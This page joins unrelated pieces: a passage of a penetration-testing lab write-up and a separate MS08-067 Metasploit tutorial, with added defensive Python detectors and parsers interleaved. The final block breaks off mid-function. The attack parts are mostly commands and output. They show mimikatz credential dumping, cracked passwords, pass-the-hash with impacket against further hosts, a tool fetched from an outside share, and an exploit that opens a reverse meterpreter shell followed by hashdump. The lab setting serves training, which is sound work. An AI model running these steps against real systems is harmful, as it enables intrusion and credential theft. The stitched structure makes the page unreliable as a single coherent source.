Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.50.97.5
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.50.97.1

Great, we got a shell, but whoami doesn't work. Unfortunately neither do the other options:

C:\WINDOWS\system32>echo %username%
echo %username%
%username%

C:\WINDOWS\system32>echo %userdomain%
echo %userdomain%
%userdomain%

C:\WINDOWS\system32>set 
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ELS-WINXP
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\NetworkService
windir=C:\WINDOWS

So we are left with what we did previously for MS17-010, upload our own whoami.exe and run it.

C:\WINDOWS\system32>copy \\172.16.5.50\Lab4\whoami.exe C:\
copy \\172.16.5.50\Lab4\whoami.exe C:\
        1 file(s) copied.

C:\>whoami.exe
whoami.exe
NT AUTHORITY\SYSTEM

So we don’t need to escalate privileges. Now the lab says to dump what hashes we can find and use those to exploit other machines. With meterpreter a hashdump would suffice. Without it, we will need something like mimikatz. Just as before, download it here, the trunk one. Copy it over and dump the hashes as before.

C:\mimikatz>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x86) #17763 Dec  9 2018 23:56:27
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:15 PM
SID               : S-1-5-19
	msv :	
	wdigest :	
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:15 PM
SID               : S-1-5-20
	msv :	
	 [00000002] Primary
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * LM       : aad3b435b51404eeaad3b435b51404ee
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	wdigest :	
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 46095 (00000000:0000b40f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:14 PM
SID               : 
	msv :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ELS-WINXP$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:14 PM
SID               : S-1-5-18
	msv :	
	wdigest :	
	kerberos :	
	 * Username : els-winxp$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :

OK, that looks odd. The passwords are all null and there's only one username. Previously I didn't suspect anything was wrong because my Win XP runs in a VMware sandbox without login creds. Now this looks odd. So I Googled and found this mimikatz guide. Basically what mimikatz does is dump the SAM and SYSTEM files in C:\Windows\System32. We can use the mimikatz lsadump command instead.

mimikatz # lsadump::sam
Domain : ELS-WINXP
SysKey : f400d255e6848ea584efcf7a12bb6636
Local SID : S-1-5-21-1715567821-1957994488-1417001333

SAMKey : 36738468e78b813c58f4f308a0e5c1f2

RID  : 000001f4 (500)
User : Administrator
  Hash LM  : 6df60586675b97c51f6252914a7633d7
  Hash NTLM: fc5399dc481550f5442d1585e10c0345

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : HelpAssistant
  Hash LM  : a88f7de3e682d17fea34bd03086620b5
  Hash NTLM: 2b07e52daf608f50d4cd9506c5b0220d

RID  : 000003ea (1002)
User : SUPPORT_388945a0
  Hash NTLM: 9f79c84005db73e0122f424022f8dbc0

RID  : 000003ec (1004)
User : netadmin
  Hash LM  : a4fd0910b9418e67d342ec751ef6b28d
  Hash NTLM: 6757a9560a881a505b9fa7bfadd88874

RID  : 000003ed (1005)
User : elsuser
  Hash NTLM: 04820cccb2ea44ad7e60f97961fba7e1

Great, we've got something. We can either crack the hashes to get the passwords or just pass the hash. After all, we're dealing with NTLM v1 here on Win XP systems. For the record, here are some of the cracked passwords:

Administrator
fc5399dc481550f5442d1585e10c0345 NTLM eLSAdminPwd 
HelpAssistant
a88f7de3e682d17fea34bd03086620b5 [No Match] 
2b07e52daf608f50d4cd9506c5b0220d NTLM RV@8EhksYn6uoO 
SUPPORT_388945a0
9f79c84005db73e0122f424022f8dbc0 [No Match] 
netadmin
6757a9560a881a505b9fa7bfadd88874 NTLM Congrat0905 
elsuser
04820cccb2ea44ad7e60f97961fba7e1 [No Match]

Let's try to pass the hash. There are many ways to do this. We could do it with PsExec from PsTools, but since we're on Linux and I didn't want to spin up my Win XP machine or use the compromised one, let's find alternatives.

The invaluable impacket tool suite lets us do this with wmiexec. I found out later that you could do it with smbexec too. So let's try. You will notice that, offhand, we do not know which of the user accounts and hashes above are accepted elsewhere, so we have to try them in succession.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :04820cccb2ea44ad7e60f97961fba7e1 elsuser@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :04820cccb2ea44ad7e60f97961fba7e1 elsuser@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :fc5399dc481550f5442d1585e10c0345 Administrator@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
els-winser2003\netadmin
C:\>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.50.97.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.50.97.1

Ultimately I found the netadmin one works, which is not so surprising given its name. However, we’re not NT AUTHORITY, sadly. The same hash attack worked with host 14.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.14
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.50.97.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.50.97.1

C:\>whoami
els-win03\netadmin

At this point I tried to enumerate both hosts with the Powerless.bat enumeration script. Unfortunately the enumeration got cut off at icacls, before the section where it tests for unquoted service paths:

echo --- Program Files and User Directories where everybody (or users) have full or modify permissions --- 
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 
...

I also tried PentestMonkey's Windows-PrivEsc-Chk, but it terminated with an error:

C:\temp>windows-privesc-check2.exe --audit -a -o report
windows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)

[i] TSUserEnabled registry value is 0. Excluding TERMINAL SERVER USER

Considering these users to be trusted:
* BUILTIN\Power Users
* BUILTIN\Administrators
* NT AUTHORITY\SYSTEM

[i] Running as current user.  No logon creds supplied (-u, -D, -p).

Traceback (most recent call last):
  File "<string>", line 22, in <module>
  File "windows_privesc_check\build\pyi.win32\windows_privesc_check\outPYZ1.pyz/wpc.utils", line 614, in populate_scaninfo
  File "windows_privesc_check\build\pyi.win32\windows_privesc_check\outPYZ1.pyz/os", line 425, in __getitem__
KeyError: 'USERDOMAIN'

Even manually running the cmd to search for unquoted service paths froze for some reason:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Fortunately for us we have another alternative, impacket's smbexec:

root@Kali:~# smbexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.14
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>exit
root@Kali:~# smbexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>whoami
nt authority\system

So how does this actually work? Curiously, as the blog explains, SMBexec doesn’t spawn a process in memory at all: it runs your commands via a batch file, deletes it, and pipes the output into a file that is then retrieved over SMB. No wonder it says “semi-interactive shell”!

The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed into a .bat file, redirects stdout and stderr to a temp file, then executes the .bat file and deletes it. Back on Kali, the Python script pulls the output file over SMB and displays its contents in our “pseudo-shell”. For every command we type into our “shell”, a new service is created and the process repeats. This is why it doesn’t need to drop a binary: it just executes each desired command as a new service. Definitely stealthier, but as we saw, an event log entry is created for every command executed. Still a very clever way to get a non-interactive “shell”!
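Because every command becomes a new service, the "service installed" events the page mentions are the defender's handle on this technique. The following is an added example, not code from the original post or from Impacket: it matches Service Control Manager Event ID 7045 records whose binary path has the shape described above (a %COMSPEC% launcher that writes a .bat, merges stderr into stdout, runs the .bat and deletes it). The one-event-per-line key=value log format, the service names and the command line in the sample are constructed test data, not real telemetry; a real pipeline would feed the same fields from Windows Event Forwarding or an EDR agent.

```python
"""Flag smbexec-style one-shot command services in 'service installed' events.

Added example for this page (not the original post's or Impacket's code).
The sample log below is constructed: pipe-separated key=value pairs, one
event per line, with the field names of System log Event ID 7045."""

import re
from typing import Dict, List

# Each trait is one feature of the mechanism the page describes.
TRAITS = {
    "comspec_launcher": re.compile(r"^\s*%COMSPEC%", re.IGNORECASE),
    "writes_batch": re.compile(r"\becho\b.*>\s*\S+\.bat", re.IGNORECASE),
    "merges_stderr": re.compile(r"2\^?>\^?&\^?1"),
    "self_deletes": re.compile(r"\bdel\b\s+\S+\.bat", re.IGNORECASE),
}
ALERT_THRESHOLD = 2  # a bare cmd.exe service is odd but not conclusive on its own

# Constructed sample: two ordinary service installs, one smbexec-style
# install, and an unrelated 7036 (service state change) event to be ignored.
SAMPLE_LOG = """\
EventID=7045|ServiceName=Spooler|ImagePath=%SystemRoot%\\System32\\spoolsv.exe|StartType=auto start
EventID=7045|ServiceName=UpdaterSvc|ImagePath=C:\\Program Files\\Example\\updater.exe|StartType=demand start
EventID=7045|ServiceName=tmpsvc1|ImagePath=%COMSPEC% /Q /c echo whoami ^> C:\\Windows\\Temp\\__out 2^>^&1 > C:\\Windows\\Temp\\run.bat & %COMSPEC% /Q /c C:\\Windows\\Temp\\run.bat & del C:\\Windows\\Temp\\run.bat|StartType=demand start
EventID=7036|ServiceName=tmpsvc1|ImagePath=|StartType=
"""


def parse_events(text: str) -> List[Dict[str, str]]:
    """Parse the constructed key=value log into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        events.append(dict(part.split("=", 1) for part in line.split("|")))
    return events


def classify_image_path(image_path: str) -> List[str]:
    """Return the names of the traits the service binary path exhibits."""
    return [name for name, rx in TRAITS.items() if rx.search(image_path)]


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one alert per 7045 event whose ImagePath matches enough traits."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "7045":
            continue
        traits = classify_image_path(ev.get("ImagePath", ""))
        if len(traits) >= ALERT_THRESHOLD:
            alerts.append({"ServiceName": ev.get("ServiceName"),
                           "ImagePath": ev.get("ImagePath"),
                           "traits": traits})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(f"{alert['ServiceName']}: {', '.join(alert['traits'])}")
```

The threshold is deliberately two traits rather than one: legitimate installers occasionally register a cmd.exe wrapper as a service, but the combination of a batch file written by echo, stderr folded into stdout, and a self-deleting .bat is the signature of a throwaway command runner rather than of a service.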

The blog also goes into some detail on how to use wmic manually, if you’re interested; that is the mechanism wmiexec builds on. It can even be used to run code remotely!

References

https://www.hacklikeapornstar.com/all-pth-techniques/

https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb

https://alexandreborgesbrazil.files.wordpress.com/2014/09/mimikatz.pdf

https://room362.com/post/2014/2014-04-19-executing-code-via-smb-without-psexec/

The full name of the MS08-067 vulnerability is «Windows Server Service RPC Request Buffer Overflow Vulnerability.» If an affected system receives a specially crafted RPC request, the vulnerability may allow remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, attackers may use this vulnerability to run arbitrary code without authentication. This vulnerability can be used to carry out worm attacks.
The following experiment uses a local test environment: a Kali attacking host and a Windows XP target machine.
Kali attack machine: 192.168.34.220
Windows XP: 192.168.34.189

Step 1: start PostgreSQL

root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
Step 2: start Metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Step 3: check the database connection status

msf > db_status 
[*] postgresql connected to msf3

Step 4: start the nmap scan

msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"\x01\t\xe0\x06")%r(SMBProgNeg,5,"\x01\t\xe0\x06")%r(T
[*] Nmap: SF:erminalServer,A,"\x01\t\xe0\x06\x01\t\xe0\x06")%r(WMSRequest,5,"\x0
[*] Nmap: SF:1\t\xe0\x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds
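One thing worth noticing in the scan above: every MS08-067 line reads CHECK DISABLED, so the scan did not actually test for the vulnerability; only the Conficker check ran. The parser below is an added example (not part of the original tutorial or of Nmap) that reads db_nmap output, keeps the port table and the smb-check-vulns block, and normalises each check into not_run / clean / vulnerable so that "no finding" is never confused with "patched". SAMPLE_SCAN is the port table and host-script block copied from the transcript above, embedded as a constructed string.

```python
"""Parse db_nmap / nmap output and report which smb-check-vulns checks ran.

Added example for this page; not code from the tutorial or from Nmap.
SAMPLE_SCAN reproduces the port table and host-script block shown above."""

import re
from typing import Dict, List, Optional

SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
"""

MSF_PREFIX = re.compile(r"^\[\*\] Nmap:\s?")          # db_nmap prepends this
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_LINE = re.compile(r"^\|[_ ]\s*(.*)$")           # "| name: value" / "|_ name: value"


def normalize_state(raw: str) -> str:
    """Map a check's free-text result to not_run / clean / vulnerable / unknown."""
    u = raw.upper()
    if "CHECK DISABLED" in u:
        return "not_run"
    if "NOT VULNERABLE" in u or "CLEAN" in u:
        return "clean"
    if "VULNERABLE" in u:
        return "vulnerable"
    return "unknown"


def parse_scan(text: str) -> Dict[str, object]:
    """Extract open ports, OS details and per-script check results."""
    ports: List[Dict[str, object]] = []
    scripts: Dict[str, Dict[str, Dict[str, str]]] = {}
    os_details: Optional[str] = None
    current_script: Optional[str] = None
    for line in text.splitlines():
        line = MSF_PREFIX.sub("", line).rstrip()
        m = PORT_LINE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5)})
            continue
        if line.startswith("OS details:"):
            os_details = line.partition(":")[2].strip()
            continue
        m = SCRIPT_LINE.match(line)
        if not m:
            continue
        name, _, value = m.group(1).partition(":")
        name, value = name.strip(), value.strip()
        if not value:                 # "| smb-check-vulns:" opens a script block
            current_script = name
            scripts.setdefault(name, {})
        elif current_script:
            scripts[current_script][name] = {"raw": value, "state": normalize_state(value)}
    return {"ports": ports, "os": os_details, "scripts": scripts}


def untested_checks(report: Dict[str, object], script: str = "smb-check-vulns") -> List[str]:
    """Checks the scan skipped, so nobody reads 'no finding' as 'patched'."""
    results = report["scripts"].get(script, {})
    return [name for name, r in results.items() if r["state"] == "not_run"]


if __name__ == "__main__":
    rep = parse_scan(SAMPLE_SCAN)
    print("open ports:", [p["port"] for p in rep["ports"]])
    print("untested:", untested_checks(rep))
```

The checks that smb-check-vulns disables by default are the ones that can crash the Server service on a vulnerable host, which is why it demands unsafe=1. On production systems the safer way to confirm exposure is patch inventory (the bulletin's update is KB958644, as the page notes) rather than re-running the scan with the unsafe checks enabled.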

Step 5: search for the vulnerability module

msf > search ms08-067
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
Step 6: view the configuration options
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Step 7: configure the parameters

msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
Step 8: launch the exploit
msf exploit(ms08_067_netapi) > exploit 
[*] Started reverse handler on 192.168.34.220:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
Step 9: the shell is returned; now operate in meterpreter
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > hashdump 
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
meterpreter > shell 
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.34.189
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.34.254
C:\WINDOWS\system32>net user
net user
User accounts for 
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     SUPPORT_388945a0         
The command completed with one or more errors.
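The hashdump output above is also a quick audit of how the target stores credentials. The following is an added example, not part of the original tutorial or of Metasploit: it parses pwdump/hashdump lines (user:RID:LM_hash:NT_hash:::) and reports the weaknesses visible from the hashes alone. Two well-known constants appear in the dump: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, and is also what Windows stores when LM hashing is disabled or the password is longer than 14 characters; 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. Because LM hashes each 7-character half of the password independently, a second half equal to aad3b435b51404ee means the password is at most 7 characters long. SAMPLE_DUMP is the listing from the transcript above, used as test data.

```python
"""Audit a pwdump/hashdump-format listing for weak credential storage.

Added example for this page (not the tutorial's or Metasploit's code).
SAMPLE_DUMP is the hashdump listing shown above, used here as test data."""

from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" / LM not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""
EMPTY_LM_HALF = EMPTY_LM[:16]                   # one 7-char LM half of ""

SAMPLE_DUMP = """\
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
"""


def parse_pwdump(text: str) -> List[Dict[str, str]]:
    """Parse pwdump lines; skips blank lines and rejects malformed hashes."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        for h in (lm, nt):
            if len(h) != 32 or any(c not in "0123456789abcdef" for c in h):
                raise ValueError(f"bad hash for {user}: {h!r}")
        records.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return records


def audit_account(rec: Dict[str, str]) -> List[str]:
    """Return the weaknesses visible from one account's stored hashes."""
    findings = []
    if rec["lm"] != EMPTY_LM:
        # LM is case-insensitive, split into 7-char halves and trivially cracked;
        # it should not be stored at all (NoLMHash policy).
        findings.append("lm_hash_stored")
        if rec["lm"][16:] == EMPTY_LM_HALF:
            findings.append("lm_password_at_most_7_chars")
    if rec["nt"] == EMPTY_NT:
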